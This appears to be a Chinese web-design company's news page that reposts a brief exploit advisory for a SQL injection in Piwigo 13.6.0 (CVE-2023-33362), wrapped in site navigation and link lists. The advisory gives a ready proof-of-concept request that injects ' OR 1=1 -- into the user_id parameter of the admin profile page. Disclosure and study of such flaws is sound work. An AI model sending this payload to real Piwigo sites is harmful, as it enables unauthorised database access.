尧图网站建设 尧图网络
  • 首页
  • 关于我们
  • 服务项目
  • 案例展示
  • 建站流程
  • 资讯中心
  • 联系我们
首页/资讯中心/详情

Piwigo 13.6.0 SQL注入漏洞详解

Piwigo 13.6.0 SQL注入漏洞详解
📅 发布时间:2026/6/20 16:57:19
本文详细分析了Piwigo图片管理软件13.6.0版本中存在的SQL注入漏洞(CVE-2023-33362),提供了完整的漏洞概念验证(PoC)和复现步骤,涉及具体的HTTP请求参数构造。

漏洞标题:Piwigo 13.6.0 - SQL注入

日期:2025-11-25

漏洞作者:CodeSecLab

软件商主页: https://github.com/Piwigo/Piwigo

软件链接:https://github.com/Piwigo/Piwigo

版本:13.6.0

测试环境:Windows

CVE:CVE-2023-33362

概念验证:

GET /admin.php?page=profile&user_id=' OR 1=1 --  HTTP/1.1
Host: piwigo

复现步骤:

  1. 以管理员用户身份登录。
  2. 发送上述请求。
  3. 观察结果。
    eQ7SPjxu3wq/iZYjEnW1MGmV38jUHbHn2zgMGOH0b6HX88G3Bid6YZy0EvGAkKdU
    更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
    对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

公众号二维码

公众号二维码

相关新闻

  • 小白刷题day2
  • diskinfo查看磁盘健康状态确保Qwen3-VL-30B稳定运行
  • docker run启动Qwen3-32B容器的常用参数详解

最新新闻

  • 海南怎么登报挂失?2026最新流程避坑指南 - 资讯速览
  • 2026南宁奢侈品回收行业白皮书:出手名贵腕表怕信息泄露,私密交易一对一全程保护隐私 - 讯息早知道
  • 2026 杭州威能地暖服务商全面测评!6 家企业实力拆解,家装采购不踩雷 - 资讯速览
  • ArcReel项目架构演进:从单体应用到多智能体协作系统的10个关键设计思考
  • StardewXnbHack终极指南:3步解锁《星露谷物语》全部游戏资源
  • 2026 年济南市厨卫屋顶防水修缮三家横向测评:吉修匠 99.8 分稳居榜首 - 吉修匠

日新闻

  • 信任的进化:技术实现详解——如何用JavaScript构建博弈论模拟器
  • Terrakube自定义工作流:如何集成OPA、Infracost等工具扩展IaC能力
  • grunt-concurrent快速入门:5分钟学会并行运行Grunt任务

周新闻

  • 3步解锁iOS设备:applera1n激活锁绕过完全指南
  • 39 2026 人工智能证书终极盘点,普通人选 AI 证书可以从这些方向入手
  • Redis 暴露公网有多危险?从端口检查到补救步骤

月新闻

  • 【总结】入门篇:50句话让你记住架构核心概念
  • WeChatMsg技术方案解析:实现Mac微信数据自主管理的完整解决方案
  • WeChatMsg:革新性微信数据备份方案,打造你的专属数字记忆库

关于尧图

  • 公司简介
  • 团队介绍
  • 企业文化
  • 荣誉资质

服务项目

  • 定制开发
  • 电商建站
  • UI 设计
  • 运维服务

快速链接

  • 案例展示
  • 建站流程
  • 常见问题
  • 资讯中心

联系方式

  • 📍北京市朝阳区互联网产业园 A 座 10 层
  • 📞400-888-8888
  • ✉️contact@rkmt.cn
  • 🕐周一至周日 9:00-21:00

© 2024 北京尧图网络科技有限公司 版权所有 | 京 ICP 备 XXXXXXXX 号